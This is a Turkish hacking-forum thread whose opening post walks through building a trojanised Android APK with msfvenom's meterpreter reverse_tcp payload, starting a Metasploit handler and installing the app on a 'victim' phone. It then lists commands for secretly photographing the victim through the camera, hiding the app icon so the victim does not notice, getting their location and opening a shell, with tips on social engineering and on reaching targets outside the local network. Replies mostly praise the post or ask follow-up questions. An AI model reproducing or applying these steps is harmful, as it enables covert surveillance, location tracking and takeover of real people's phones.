M-e-t-asploit ile Android Cihazları Hackleyin. //Siber Güvenlik Kulübü

ratio · 16 Ocak 2020

Métasploit ile Android Cihazları Hackleyin. //Siber Güvenlik Kulübü

İşlemin gerçekleşmesi için Met@sploit aracılığı ile oluşturacağımız androidapkyı kurbanın telefonuna yüklenmesi ve açılması gerekmektedir.

Öncelikle Kali Linux makinemizde terminale giriyoruz. Aşağıdaki komutu girerek, önümüze gelen bilgilerden örn: inet = 192.168.1.41 IP adresimizi öğreniyoruz.

Kod:

ifconfig

Daha sonra aşağıdaki komutda uygun yerleri düzelterek androidapkmızı oluşturuyouz.

msfvenom p android/meterpreter/reverse_tcp LHOST=IP_ADRESINIZ LPORT=4444 R > APKYI_OLUŞTURMAK/ISTEDIGINIZ/DIZIN

Örneğin ben masaüstünde yukarıda belirttiğimiz IP Adresinde, androidApk isimli bir apk oluşturmak için bu şekilde dolduruyorum.

Kod:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.41 LPORT=4444 R > /root/Desktop/androidApp.apk

Daha sonra aşağıdaki komutları ard arda yazarak apache servisimizi açıyoruz ve açılıp açılmadığını kontrol ediyoruz.

Kod:

service apache2 start

Kod:

service apache2 status

Daha sonra Met@sploiti açıyoruz.

Kod:

msfconsole

Aşağıdaki komutu yazarak payloadımızı seçiyoruz.

Kod:

set payload android/meterpreter/reverse_tcp

Daha sonra aşağıdaki komutu girerek seçeneklere bakıyoruz.

Kod:

show options

Aşağıdaki komutu girerek IP adresimizi ayarlıyoruz.

Kod:

set LHOST 192.168.1.41

Daha sonra da aşağıdaki komutu girerek sömürme işlemimizi başlatıyoruz.

Kod:

exploit

Met@sploit el sıkışmasını beklerken kurbana oluşturduğumuz apkyı indiriyoruz, kuruyoruz daha sonra da açıyoruz.

Bağlantı alınca komut satırımız geliyor zaten.

Komut satırımıza aşağıdaki komutu yazıyoruz.

Kod:

background

Daha sonra aşağıdaki kodu yazarak oturumları listeliyoruz.

Kod:

sessions

Daha sonra da bağlanacağımız oturumun numarasına bakıyoruz ve aşağıdaki komutu giriyoruz.

sessions i OTURUM_NUMARASI

Örn:

Kod:

sessions i 2

Daha sonra bağlantıyı kurmuş bulunuyoruz şimdi aşağıdaki komutu yazarak neler yapabileceğimize bakıyoruz.

Kod:

help

Örnekler;

app_list yazarak yüklü olan uygulamaları listeleyebiliriz.

webcam_snap diyerek kurban farkına varmadan kamerasından görüntü alabiliriz.

[url=https://hizliresim.com/AOBL6r][img]https://i.hizliresim.com/AOBL6r.jpg[/img][/url]

hide_app_icon diyerek uygulamanın ikonunu gizleyebiliriz. Böylece menüde uygulamayı göremeyecektir. Sosyal mühendislik yaptıysanız uygulamanın yüklü olduğunun farkına bile varmayabilir.

[url=https://hizliresim.com/zGd3l9][img]https://i.hizliresim.com/zGd3l9.png[/img][/url]

geolocate komutu ile kurbanın bulunduğu konumun koordinatlarını elde edebiliriz.

shell komutu ile terminal oluşturabiliriz ve terminali dilediğimiz gibi kullanabiliriz.

NOT: Root olmak için benim cihazımda kontrol eden uygulama vardı bu yüzden cihazımdan izin istediğimde ekrana bildirim gidiyordu. Ayrıca uygulamada root değilseniz bazı özellikleri kullanamayacaksınız. (Yukarıdakiler için izine ihtiyaç yoktur.)

Videolu Anlatım:

https://www.youtube.com/watch?v=YRm-St0bJhU

P4RS · 16 Ocak 2020

Cevap: Met@sploit ile Android Cihazları Hackleyin. //Siber Güvenlik Kulübü

Ellerine sağlık PigGunner

)

R4V3N · 16 Ocak 2020

Sansürleniyor diye m-e-t-a yapacağına méta yapabilirdin fyi

TheCrazY · 16 Ocak 2020

Termuxda nasıl yapabilirim

IboCanReyis · 16 Ocak 2020

Sadece http isteklerini görebileceğimiz bir program var mı ? veya apk ?
( zAnti hariç )

ratio · 16 Ocak 2020

"P4RS' Alıntı:
Ellerine sağlık PigGunner )

Teşekkürler, hocam.

R4V3N' Alıntı:
Sansürleniyor diye m-e-t-a yapacağına méta yapabilirdin fyi

Ben yapmamıştım da bence de daha mantıklı ama düzeltemiyorum.

TheCrazY' Alıntı:
Termuxda nasıl yapabilirim

Bildiğim kadarıyla termuxda da ****sploit'in çalışıyor olması lazım. Kodları aynı şekilde kullanabiliyor olmalısınız.

IboCanReyis' Alıntı:
Sadece http isteklerini görebileceğimiz bir program var mı ? veya apk ?
( zAnti hariç )

Ağdaki trafiği izlemek gibi bir şey kasıt ediyorsanız, wireshark ile http filtresine alarak bakabilirsiniz veya Charles isimli uygulamaya bir göz atabilirsiniz.

Bağlantı: https://www.charlesproxy.com/

Yapılandırma adımları:

Telefonunuzun ve PC'nizin veya MAC'inizin aynı LAN'da olmasına izin verin. (Aynı ağa bağlayın.)
Yüklediğiniz Charles'ı başlatın. (varsayılan proxy bağlantı noktası 8888'dir)
Telefonunuzun wifi yapılandırmasını ayarlayın: delege ipini PC'nize veya MAC'in ip'sine ayarlayın (set the ip of delegate to your PC or MAC's ip), delege portuna 8888 olarak ayarlayın.
Telefonunuzda uygulamanızı başlatın. Charles ile http isteklerini izleyin.

Ayrıca aşağıdaki bağlantıdan daha fazlası için göz atabilirsiniz.
Bağlantı: https://proandroiddev.com/various-m...affic-in-the-android-application-8685b9183418

İyi forumlar..

shellnetw0rk · 29 Ocak 2020

dış ağ için port şartmı ?

ratio · 31 Ocak 2020

shellnetw0rk' Alıntı:
dış ağ için port şartmı ?

Evet, dilerseniz portunuzu modeminize ya da modeminize açılamıyorsa internet üzerinden port açabilir ve kullanabilirsiniz. Portlarla ilgili konuları sitemizde bulabilirsiniz.

İyi forumlar.

CH · 31 Ocak 2020

Eline sağlık. Bir insanın bütün konuları güzel olur mu ? oluyormuş

Başarılarının devamını dilerim.

By Ghost · 31 Ocak 2020

Ellerine sağlık böyle devam

ratio · 31 Ocak 2020

xCheaTeR' Alıntı:
Eline sağlık. Bir insanın bütün konuları güzel olur mu ? oluyormuş Başarılarının devamını dilerim.

:kahkaha:kahkaha Teşekkür ederim, teveccühünüz efendim.

By Ghost' Alıntı:
Ellerine sağlık böyle devam

Teşekkürler, inşAllah.

M-e-t-asploit ile Android Cihazları Hackleyin. //Siber Güvenlik Kulübü

ratio

Kıdemli Üye

P4RS

Özel Üye

R4V3N

Adanmış Üye

TheCrazY

Yeni üye

IboCanReyis

Uzman üye

ratio

Kıdemli Üye

shellnetw0rk

Üye

ratio

Kıdemli Üye

CH

Moderatör

By Ghost

Katılımcı Üye

ratio

Kıdemli Üye

Sosyal medya sayfalarımız